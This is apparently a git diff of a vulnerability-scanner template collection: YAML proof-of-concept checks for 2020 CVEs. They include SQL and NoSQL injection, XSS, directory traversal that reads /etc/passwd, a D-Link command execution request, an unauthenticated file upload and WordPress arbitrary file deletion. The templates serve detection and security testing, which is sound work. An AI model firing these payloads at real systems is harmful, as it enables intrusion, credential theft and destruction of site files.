+ tags: cve2020,cve,domainmod,xss,authenticated
-requests:
+http:
- raw:
- |
POST / HTTP/1.1
@@ -33,17 +43,14 @@ requests:
daterange=%22%2F%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
- cookie-reuse: true
- req-condition: true
- redirects: true
+ host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'status_code_2 == 200'
- - 'contains(all_headers_2, "text/html")'
+ - 'contains(header_2, "text/html")'
- 'contains(body_2, "value=\"\"/>")'
- 'contains(body_2, "DomainMOD")'
condition: and
-
-# Enhanced by mp on 2022/08/14
+# digest: 4a0a00473045022100fbb0177d572dab76f291eb8c5192458be9114f6ff475722fe228667a0a17f96602207f0bf6ee4c83004d0e951aaadb9b2b40b09318391f86ca1b5a3629de44e3adfb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-22209.yaml b/poc/cve/cve-2020-22209.yaml
new file mode 100644
index 0000000000..0b164d90aa
--- /dev/null
+++ b/poc/cve/cve-2020-22209.yaml
@@ -0,0 +1,47 @@
+id: CVE-2020-22209
+
+info:
+ name: 74cms - ajax_common.php SQL Injection
+ author: ritikchaddha
+ severity: critical
+ description: |
+ SQL Injection in 74cms 3.2.0 via the query parameter to plus/ajax_common.php.
+ impact: |
+ Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the underlying database.
+ remediation: |
+ Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_common.php file.
+ reference:
+ - https://github.com/blindkey/cve_like/issues/12
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-22209
+ - https://github.com/20142995/sectool
+ - https://github.com/ARPSyndicate/cvemon
+ - https://github.com/ARPSyndicate/kenzer-templates
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-22209
+ cwe-id: CWE-89
+ epss-score: 0.15522
+ epss-percentile: 0.95775
+ cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: 74cms
+ product: 74cms
+ shodan-query: http.html:"74cms"
+ fofa-query: app="74cms"
+ tags: cve,cve2020,74cms,sqli
+variables:
+ num: "999999999"
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/plus/ajax_common.php?act=hotword&query=aa%錦%27%20union%20select%201,md5({{num}}),3%23%27'
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '{{md5({{num}})}}'
+# digest: 4a0a004730450221009e55b332e27a60cf87cccd81422880062f90e44d254777bb1ec7f9140fa0054502205fddccf82cfe56707866b8766e8b74347aef1bf754927ccb40079bb273c5b359:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-22210.yaml b/poc/cve/cve-2020-22210.yaml
new file mode 100644
index 0000000000..5002d18314
--- /dev/null
+++ b/poc/cve/cve-2020-22210.yaml
@@ -0,0 +1,45 @@
+id: CVE-2020-22210
+
+info:
+ name: 74cms - ajax_officebuilding.php SQL Injection
+ author: ritikchaddha
+ severity: critical
+ description: |
+ A SQL injection vulnerability exists in 74cms 3.2.0 via the x parameter to ajax_officebuilding.php.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation.
+ remediation: |
+ Apply the latest patch or update provided by the vendor to fix the SQL Injection vulnerability in the 74cms - ajax_officebuilding.php file.
+ reference:
+ - https://github.com/blindkey/cve_like/issues/11
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-22210
+ - https://github.com/ARPSyndicate/kenzer-templates
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2020-22210
+ cwe-id: CWE-89
+ epss-score: 0.20254
+ epss-percentile: 0.95933
+ cpe: cpe:2.3:a:74cms:74cms:3.2.0:*:*:*:*:*:*:*
+ metadata:
+ max-request: 1
+ vendor: 74cms
+ product: 74cms
+ shodan-query: http.html:"74cms"
+ fofa-query: app="74cms"
+ tags: cve,cve2020,74cms,sqli
+variables:
+ num: "999999999"
+
+http:
+ - method: GET
+ path:
+ - '{{BaseURL}}/plus/ajax_officebuilding.php?act=key&key=錦%27%20a<>nd%201=2%20un<>ion%20sel<>ect%201,2,3,md5({{num}}),5,6,7,8,9%23'
+
+ matchers:
+ - type: word
+ part: body
+ words:
+ - '{{md5({{num}})}}'
+# digest: 4a0a00473045022100871fd309f948d3202f0de9e37571c921c7c90656777d3fd15ab38733ad2408c102204f62211c931f9e30ab1ff0bf20bb503191ed0af758f8fe2b0373f48ec8bcd315:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-23015.yaml b/poc/cve/cve-2020-23015.yaml
index d01da81880..97f4de8c09 100644
--- a/poc/cve/cve-2020-23015.yaml
+++ b/poc/cve/cve-2020-23015.yaml
@@ -8,12 +8,12 @@ info:
reference:
- https://github.com/opnsense/core/issues/4061
- https://www.cvedetails.com/cve/CVE-2020-23015
- tags: cve,cve2020,redirect,opnsense
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2020-23015
cwe-id: CWE-601
+ tags: cve,cve2020,redirect,opnsense
requests:
- method: GET
@@ -23,6 +23,6 @@ requests:
matchers:
- type: regex
- regex:
- - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
part: header
+ regex:
+ - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
\ No newline at end of file
diff --git a/poc/cve/cve-2020-24579.yaml b/poc/cve/cve-2020-24579.yaml
index dfc9858c10..98bea02cd2 100644
--- a/poc/cve/cve-2020-24579.yaml
+++ b/poc/cve/cve-2020-24579.yaml
@@ -1,31 +1,21 @@
id: CVE-2020-24579
info:
- name: D-Link DSL 2888a - Authentication Bypass/Remote Command Execution
+ name: D-Link DSL 2888a - Remote Command Execution
author: pikpikcu
severity: high
- description: D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55 are vulnerable to authentication bypass issues which can lead to remote command execution. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.
- remediation: |
- Apply the latest firmware update provided by D-Link to fix the vulnerability.
+ description: An issue was discovered on D-Link DSL-2888A devices with firmware prior to AU_2.31_V1.1.47ae55. An unauthenticated attacker could bypass authentication to access authenticated pages and functionality.
reference:
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
- https://www.trustwave.com/en-us/resources/security-resources/security-advisories/
- - https://nvd.nist.gov/vuln/detail/CVE-2020-24579
classification:
cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2020-24579
cwe-id: CWE-287
- epss-score: 0.02322
- epss-percentile: 0.88548
- cpe: cpe:2.3:o:dlink:dsl2888a_firmware:*:*:*:*:*:*:*:*
- metadata:
- max-request: 2
- vendor: dlink
- product: dsl2888a_firmware
tags: cve,cve2020,dlink,rce
-http:
+requests:
- raw:
- | # Response:Location: /page/login/login_fail.html
POST / HTTP/1.1
@@ -33,6 +23,7 @@ http:
Cookie: uid=6gPjT2ipmNz
username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
+
- | # Get /etc/passwd
GET /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=cat%20/etc/passwd HTTP/1.1
Host: {{Hostname}}
@@ -40,13 +31,12 @@ http:
matchers-condition: and
matchers:
+ - type: status
+ status:
+ - 200
+
- type: regex
regex:
- "nobody:[x*]:65534:65534"
- "root:.*:0:0:"
condition: or
-
- - type: status
- status:
- - 200
-# digest: 4a0a00473045022100a69c2a5153c5277c8eaf8c22c0761a3ca0f649271a4d84b0d4a88674daad6a6e02205a4b85e41ea49153f49fab09da3e57ad15a447491f67b87567408abab28fc606:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-25223.yaml b/poc/cve/cve-2020-25223.yaml
index 2de4a5f82a..b8f310742c 100644
--- a/poc/cve/cve-2020-25223.yaml
+++ b/poc/cve/cve-2020-25223.yaml
@@ -9,9 +9,10 @@ info:
- https://www.atredis.com/blog/2021/8/18/sophos-utm-cve-2020-25223
- https://community.sophos.com/b/security-blog/posts/advisory-resolved-rce-in-sg-utm-webadmin-cve-2020-25223
- https://nvd.nist.gov/vuln/detail/CVE-2020-25223
+ - https://community.sophos.com/b/security-blog
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
cve-id: CVE-2020-25223
tags: cve,cve2020,sophos,rce,oast,unauth
diff --git a/poc/cve/cve-2020-25540.yaml b/poc/cve/cve-2020-25540.yaml
index bbb3f29336..09ea481ed3 100644
--- a/poc/cve/cve-2020-25540.yaml
+++ b/poc/cve/cve-2020-25540.yaml
@@ -1,12 +1,21 @@
id: CVE-2020-25540
-info:
+info:
name: ThinkAdmin 6 - Arbitrarily File Read (CVE-2020-25540)
author: geeknik
- severity: medium
- description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrarily file on a remote server via GET request encode parameter.
-
- # Reference:- https://www.exploit-db.com/exploits/48812
+ severity: high
+ description: ThinkAdmin v6 is affected by a directory traversal vulnerability. An unauthorized attacker can read arbitrary files on a remote server via GET request encode parameter.
+ reference:
+ - https://www.exploit-db.com/exploits/48812
+ - https://github.com/zoujingli/ThinkAdmin/issues/244
+ - https://wtfsec.org/posts/thinkadmin-v6-%E5%88%97%E7%9B%AE%E5%BD%95-%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96/
+ - http://packetstormsecurity.com/files/159177/ThinkAdmin-6-Arbitrary-File-Read.html
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2020-25540
+ cwe-id: CWE-22
+ tags: cve,cve2020,thinkadmin,lfi
requests:
- method: GET
@@ -20,4 +29,4 @@ requests:
- 200
- type: regex
regex:
- - "root:[x*]:0:0:"
+ - "root:.*:0:0:"
diff --git a/poc/cve/cve-2020-25780.yaml b/poc/cve/cve-2020-25780.yaml
index 3017afb630..c85c8fac4e 100644
--- a/poc/cve/cve-2020-25780.yaml
+++ b/poc/cve/cve-2020-25780.yaml
@@ -4,16 +4,17 @@ info:
name: Commvault CommCell Directory Traversal
author: pdteam
severity: high
- tags: cve,cve2020,commvault,lfi
description: In CommCell in Commvault before 14.68, 15.x before 15.58, 16.x before 16.44, 17.x before 17.29, and 18.x before 18.13, Directory Traversal can occur such that an attempt to view a log file can instead view a file outside of the log-files folder.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-25780
- https://srcincite.io/blog/2021/11/22/unlocking-the-vault.html
+ - http://kb.commvault.com/article/63264
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
- cvss-score: 7.50
+ cvss-score: 7.5
cve-id: CVE-2020-25780
cwe-id: CWE-22
+ tags: cve,cve2020,commvault,lfi
requests:
- method: POST
diff --git a/poc/cve/cve-2020-26919.yaml b/poc/cve/cve-2020-26919.yaml
index f7e7ceacc4..f20753ee21 100644
--- a/poc/cve/cve-2020-26919.yaml
+++ b/poc/cve/cve-2020-26919.yaml
@@ -4,14 +4,15 @@ info:
name: NETGEAR ProSAFE Plus - Unauthenticated Remote Code Execution
author: gy741
severity: critical
- description: "NETGEAR ProSAFE Plus before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands."
+ description: NETGEAR ProSAFE Plus before 2.6.0.43 is susceptible to unauthenticated remote code execution. Any HTML page is allowed as a valid endpoint to submit POST requests, allowing debug action via the submitId and debugCmd parameters. The problem is publicly exposed in the login.html webpage, which has to be publicly available to perform login requests but does not implement any restriction for executing debug actions. This will allow attackers to execute system commands.
reference:
- https://research.nccgroup.com/2021/03/08/technical-advisory-multiple-vulnerabilities-in-netgear-prosafe-plus-jgs516pe-gs116ev2-switches/
- https://unit42.paloaltonetworks.com/mirai-variant-iot-vulnerabilities/
- https://nvd.nist.gov/vuln/detail/CVE-2020-26919
+ - https://kb.netgear.com/000062334/Security-Advisory-for-Missing-Function-Level-Access-Control-on-JGS516PE-PSV-2020-0377
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
cve-id: CVE-2020-26919
tags: cve,cve2020,netgear,rce,oast,router,unauth
diff --git a/poc/cve/cve-2020-27735.yaml b/poc/cve/cve-2020-27735.yaml
index 1872a84f50..d41f8d89b4 100644
--- a/poc/cve/cve-2020-27735.yaml
+++ b/poc/cve/cve-2020-27735.yaml
@@ -1,15 +1,15 @@
id: CVE-2020-27735
info:
- name: Wing FTP 6.4.4 - Cross-Site Scripting
+ name: Wing FTP's Web Interface XSS
author: pikpikcu
severity: medium
description: |
- Wing FTP 6.4.4 is vulnerable to cross-site scripting via its web interface because an arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
+ An XSS issue was discovered in Wing FTP 6.4.4. An arbitrary IFRAME element can be included in the help pages via a crafted link, leading to the execution of (sandboxed) arbitrary HTML and JavaScript in the user's browser.
reference:
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-27735
- https://www.wftpserver.com/serverhistory.htm
- https://wshenk.blogspot.com/2021/01/xss-in-wing-ftps-web-interface-cve-2020.html
- - https://nvd.nist.gov/vuln/detail/CVE-2020-27735
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
@@ -20,7 +20,7 @@ info:
requests:
- method: GET
path:
- - "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"
+ - "{{BaseURL}}/help/english/index.html?javascript:alert(document.domain)"
matchers-condition: and
matchers:
@@ -37,5 +37,3 @@ requests:
part: header
words:
- text/html
-
-# Enhanced by mp on 2022/08/14
diff --git a/poc/cve/cve-2020-27986.yaml b/poc/cve/cve-2020-27986.yaml
new file mode 100644
index 0000000000..b59fc6a4bb
--- /dev/null
+++ b/poc/cve/cve-2020-27986.yaml
@@ -0,0 +1,37 @@
+id: CVE-2020-27986
+
+info:
+ name: SonarQube unauth
+ author: pikpikcu
+ severity: high
+ description: |
+ SonarQube 8.4.2.36762 allows remote attackers to discover cleartext SMTP,
+ SVN, and GitLab credentials via the api/settings/values URI.
+ NOTE: reportedly, the vendor's position for SMTP and SVN is "it is the administrator's responsibility to configure it."
+ reference:
+ - https://csl.com.co/sonarqube-auditando-al-auditor-parte-i/
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+ cvss-score: 7.5
+ cve-id: CVE-2020-27986
+ cwe-id: CWE-306,CWE-312
+ tags: cve,cve2020,sonarqube
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/api/settings/values"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - email.smtp_host.secured
+ - email.smtp_password.secured
+ - email.smtp_port.secured
+ - email.smtp_username.secured
+ part: body
+ condition: and
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2020-28351.yaml b/poc/cve/cve-2020-28351.yaml
new file mode 100644
index 0000000000..7695defd90
--- /dev/null
+++ b/poc/cve/cve-2020-28351.yaml
@@ -0,0 +1,41 @@
+id: CVE-2020-28351
+
+info:
+ name: ShoreTel 19.46.1802.0 XSS
+ author: pikpikcu
+ severity: medium
+ description: conferencing component on Mitel ShoreTel 19.46.1802.0 devices could allow an unauthenticated attacker to conduct a reflected cross-site scripting (XSS) attack (via the PATH_INFO to index.php) due to insufficient validation for the time_zone object in the HOME_MEETING& page
+ reference:
+ - https://packetstormsecurity.com/files/159987/ShoreTel-Conferencing-19.46.1802.0-Cross-Site-Scripting.html
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-28351
+ - https://www.mitel.com/articles/what-happened-shoretel-products
+ - https://github.com/dievus/cve-2020-28351
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2020-28351
+ cwe-id: CWE-79
+ tags: cve,cve2020,shoretel,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E?page=HOME"
+ headers:
+ Content-Type: application/x-www-form-urlencoded
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ''
+ part: body
+
+ - type: word
+ words:
+ - 'Content-Type: text/html'
+ part: header
+
+ - type: status
+ status:
+ - 200
diff --git a/poc/cve/cve-2020-29227.yaml b/poc/cve/cve-2020-29227.yaml
index b22baeb363..2ad1cca8f4 100644
--- a/poc/cve/cve-2020-29227.yaml
+++ b/poc/cve/cve-2020-29227.yaml
@@ -1,29 +1,34 @@
id: CVE-2020-29227
info:
- name: Car Rental Management System 1.0 - Local File Inclusion (LFI)
+ name: Car Rental Management System 1.0 - Local File Inclusion
author: daffainfo
severity: critical
- description: An issue was discovered in Car Rental Management System 1.0. An unauthenticated user can perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, to cause local file inclusion resulting in code execution.
+ description: Car Rental Management System 1.0 allows an unauthenticated user to perform a file inclusion attack against the /index.php file with a partial filename in the "page" parameter, leading to code execution.
reference:
- https://loopspell.medium.com/cve-2020-29227-unauthenticated-local-file-inclusion-7d3bd2c5c6a5
- https://nvd.nist.gov/vuln/detail/CVE-2020-29227
- tags: cve,cve2020,lfi
+ - https://www.sourcecodester.com/php/14544/car-rental-management-system-using-phpmysqli-source-code.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
- cvss-score: 9.80
+ cvss-score: 9.8
cve-id: CVE-2020-29227
+ tags: cve,cve2020,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?page=/etc/passwd%00"
+
matchers-condition: and
matchers:
- type: regex
+ part: body
regex:
- "root:.*:0:0:"
- part: body
+
- type: status
status:
- 200
+
+# Enhanced by mp on 2022/05/16
diff --git a/poc/cve/cve-2020-29597.yaml b/poc/cve/cve-2020-29597.yaml
index 250129bae7..cf65d76241 100644
--- a/poc/cve/cve-2020-29597.yaml
+++ b/poc/cve/cve-2020-29597.yaml
@@ -6,21 +6,32 @@ info:
severity: critical
description: |
IncomCMS 2.0 has a an insecure file upload vulnerability in modules/uploader/showcase/script.php. This allows unauthenticated attackers to upload files into the server.
+ impact: |
+ Successful exploitation of this vulnerability can result in unauthorized access, data leakage, and potential remote code execution.
+ remediation: |
+ Apply the latest security patch or update to a version that addresses the vulnerability.
reference:
- https://github.com/Trhackno/CVE-2020-29597
- https://nvd.nist.gov/vuln/detail/CVE-2020-29597
- https://github.com/M4DM0e/m4dm0e.github.io/blob/gh-pages/_posts/2020-12-07-incom-insecure-up.md
- https://m4dm0e.github.io/2020/12/07/incom-insecure-up.html
+ - https://github.com/trhacknon/CVE-2020-29597
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-29597
cwe-id: CWE-434
+ epss-score: 0.78448
+ epss-percentile: 0.9817
+ cpe: cpe:2.3:a:incomcms_project:incomcms:2.0:*:*:*:*:*:*:*
metadata:
- verified: "true"
- tags: cve,cve2020,incomcms,fileupload,intrusive
+ verified: true
+ max-request: 2
+ vendor: incomcms_project
+ product: incomcms
+ tags: cve,cve2020,incomcms,fileupload,intrusive,incomcms_project
-requests:
+http:
- raw:
- |
POST /incom/modules/uploader/showcase/script.php HTTP/1.1
@@ -33,12 +44,10 @@ requests:
{{randstr_2}}
------WebKitFormBoundaryBEJZt0IK73M2mAbt--
-
- |
GET /upload/userfiles/image/{{randstr_1}}.png HTTP/1.1
Host: {{Hostname}}
- req-condition: true
matchers-condition: and
matchers:
- type: word
@@ -50,5 +59,4 @@ requests:
part: body_2
words:
- '{{randstr_2}}'
-
-# Enhanced by CS 06/06/2022
+# digest: 4a0a00473045022100ab5832fbca2af41f73d0a9dd5b7e6a5d11131ec0ef50cf26f0613d515b953718022046f83ee4202dafd7b1a1b379f116c6d1a31b1ebe1dc45a9e355c444f9e84e968:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/cve/cve-2020-35749.yaml b/poc/cve/cve-2020-35749.yaml
index 94c2be7907..7ad59e3734 100644
--- a/poc/cve/cve-2020-35749.yaml
+++ b/poc/cve/cve-2020-35749.yaml
@@ -1,13 +1,15 @@
id: CVE-2020-35749
info:
- name: Simple Job Board < 2.9.4 - Authenticated Path Traversal Leading to Arbitrary File Download
+ name: Simple Job Board < 2.9.4 -Arbitrary File Retrieval (Authenticated)
author: cckuailong
severity: high
description: The plugin does not validate the sjb_file parameter when viewing a resume, allowing authenticated user with the download_resume capability (such as HR users) to download arbitrary files from the web-server via a path traversal attack.
reference:
- https://wpscan.com/vulnerability/eed3bd69-2faf-4bc9-915c-c36211ef9e2d
- https://nvd.nist.gov/vuln/detail/CVE-2020-35749
+ - https://docs.google.com/document/d/1TbePkrRGsczepBaJptIdVRvfRrjiC5hjGg_Vxdesw6E/edit?usp=sharing
+ - http://packetstormsecurity.com/files/161050/Simple-JobBoard-Authenticated-File-Read.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.7
diff --git a/poc/cve/cve-2020-35774.yaml b/poc/cve/cve-2020-35774.yaml
new file mode 100644
index 0000000000..72a6ca1ba6
--- /dev/null
+++ b/poc/cve/cve-2020-35774.yaml
@@ -0,0 +1,42 @@
+id: CVE-2020-35774
+
+info:
+ name: twitter-server Cross-Site Scripting
+ author: pikpikcu
+ severity: medium
+ description: |
+ twitter-server before 20.12.0 is vulnerable to cross-site scripting in some configurations. The vulnerability exists in the administration panel of twitter-server in the histograms component via server/handler/HistogramQueryHandler.scala.
+ reference:
+ - https://advisory.checkmarx.net/advisory/CX-2020-4287
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-35774
+ - https://github.com/twitter/twitter-server/commit/e0aeb87e89a6e6c711214ee2de0dd9f6e5f9cb6c
+ - https://github.com/twitter/twitter-server/compare/twitter-server-20.10.0...twitter-server-20.12.0
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2020-35774
+ cwe-id: CWE-79
+ tags: cve,cve2020,xss,twitter-server
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/admin/histograms?h=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&fmt=plot_cdf&log_scale=true"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ''
+
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+# Enhanced by mp on 2022/04/04
diff --git a/poc/cve/cve-2020-35848.yaml b/poc/cve/cve-2020-35848.yaml
index 5d48c3664f..703b0efb37 100644
--- a/poc/cve/cve-2020-35848.yaml
+++ b/poc/cve/cve-2020-35848.yaml
@@ -5,33 +5,24 @@ info:
author: dwisiswant0
severity: critical
description: Agentejo Cockpit prior to 0.12.0 is vulnerable to NoSQL Injection via the newpassword method of the Auth controller, which is responsible for displaying the user password reset form.
- remediation: |
- Upgrade Agentejo Cockpit to version 0.12.0 or later to mitigate this vulnerability.
reference:
- https://swarm.ptsecurity.com/rce-cockpit-cms/
- https://nvd.nist.gov/vuln/detail/CVE-2020-35848
- https://getcockpit.com/
- https://github.com/agentejo/cockpit/commit/2a385af8d80ed60d40d386ed813c1039db00c466
- - https://github.com/agentejo/cockpit/commit/33e7199575631ba1f74cba6b16b10c820bec59af
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-35848
cwe-id: CWE-89
- epss-score: 0.71273
- epss-percentile: 0.97736
- cpe: cpe:2.3:a:agentejo:cockpit:*:*:*:*:*:*:*:*
- metadata:
- max-request: 1
- vendor: agentejo
- product: cockpit
tags: cve,cve2020,nosqli,sqli,cockpit,injection
-http:
+requests:
- method: POST
path:
- "{{BaseURL}}/auth/newpassword"
-
+ headers:
+ Content-Type: application/json
body: |
{
"token": {
@@ -39,11 +30,10 @@ http:
}
}
- headers:
- Content-Type: application/json
matchers:
- type: regex
part: body
regex:
- 'string\([0-9]{1,3}\)(\s)?"rp-([a-f0-9-]+)"'
-# digest: 490a00463044022075d03d73e66908e21caf87fc35087b14321fa4499bc70896a4d1b4bced28944b02207028b8d5471341bcff9a320cb4fd8c6666f86a676bb4956c6553c8030e51cc38:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+
+# Enhanced by mp on 2022/04/28
diff --git a/poc/cve/cve-2020-35951.yaml b/poc/cve/cve-2020-35951.yaml
new file mode 100644
index 0000000000..72b76b1df4
--- /dev/null
+++ b/poc/cve/cve-2020-35951.yaml
@@ -0,0 +1,71 @@
+id: CVE-2020-35951
+
+info:
+ name: Wordpress Quiz and Survey Master <7.0.1 - Arbitrary File Deletion
+ author: princechaddha
+ severity: critical
+ description: Wordpress Quiz and Survey Master <7.0.1 allows users to delete arbitrary files such as wp-config.php file, which could effectively take a site offline and allow an attacker to reinstall with a WordPress instance under their control. This occurred via qsm_remove_file_fd_question, which allowed unauthenticated deletions (even though it was only intended for a person to delete their own quiz-answer files).
+ reference:
+ - https://www.wordfence.com/blog/2020/08/critical-vulnerabilities-patched-in-quiz-and-survey-master-plugin/
+ - https://nvd.nist.gov/vuln/detail/CVE-2020-35951
+ - https://wpscan.com/vulnerability/10348
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:H
+ cvss-score: 9.9
+ cve-id: CVE-2020-35951
+ cwe-id: CWE-306
+ tags: cve,cve2020,wordpress,wp-plugin
+
+requests:
+ - raw:
+ - |
+ GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ GET /wp-content/plugins/quiz-master-next/tests/_support/AcceptanceTester.php HTTP/1.1
+ Host: {{Hostname}}
+
+ - |
+ POST /wp-admin/admin-ajax.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryBJ17hSJBjuGrnW92
+
+
+ ------WebKitFormBoundaryBJ17hSJBjuGrnW92
+ Content-Disposition: form-data; name="action"
+
+ qsm_remove_file_fd_question
+ ------WebKitFormBoundaryBJ17hSJBjuGrnW92
+ Content-Disposition: form-data; name="file_url"
+
+ {{fullpath}}wp-content/plugins/quiz-master-next/README.md
+ ------WebKitFormBoundaryBJ17hSJBjuGrnW92--
+
+ - |
+ GET /wp-content/plugins/quiz-master-next/README.md HTTP/1.1
+ Host: {{Hostname}}
+
+ extractors:
+ - type: regex
+ name: fullpath
+ internal: true
+ part: body
+ group: 1
+ regex:
+ - "not found in ([/a-z_]+)wp"
+
+ req-condition: true
+ matchers-condition: and
+ matchers:
+
+ - type: word
+ words:
+ - '{"type":"success","message":"File removed successfully"}'
+ part: body
+
+ - type: dsl
+ dsl:
+ - "contains((body_1), '# Quiz And Survey Master') && status_code_4==301 && !contains((body_4), '# Quiz And Survey Master')"
+
+# Enhanced by mp on 2022/04/28
diff --git a/poc/cve/cve-2020-36510.yaml b/poc/cve/cve-2020-36510.yaml
index 5fec7dce2a..2617428d5d 100644
--- a/poc/cve/cve-2020-36510.yaml
+++ b/poc/cve/cve-2020-36510.yaml
@@ -6,19 +6,31 @@ info:
severity: medium
description: |
WordPress 15Zine before 3.3.0 is vulnerable to reflected cross-site scripting because the theme does not sanitize the cbi parameter before including it in the HTTP response via the cb_s_a AJAX action.
+ impact: |
+ Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information.
+ remediation: |
+ Update WordPress 15Zine to version 3.3.0 or later to mitigate the vulnerability.
reference:
- https://wpscan.com/vulnerability/d1dbc6d7-7488-40c2-bc38-0674ea5b3c95
- https://nvd.nist.gov/vuln/detail/CVE-2020-36510
+ - https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- cvss-score: 6.10
+ cvss-score: 6.1
cve-id: CVE-2020-36510
cwe-id: CWE-79
+ epss-score: 0.00106
+ epss-percentile: 0.42122
+ cpe: cpe:2.3:a:codetipi:15zine:*:*:*:*:*:wordpress:*:*
metadata:
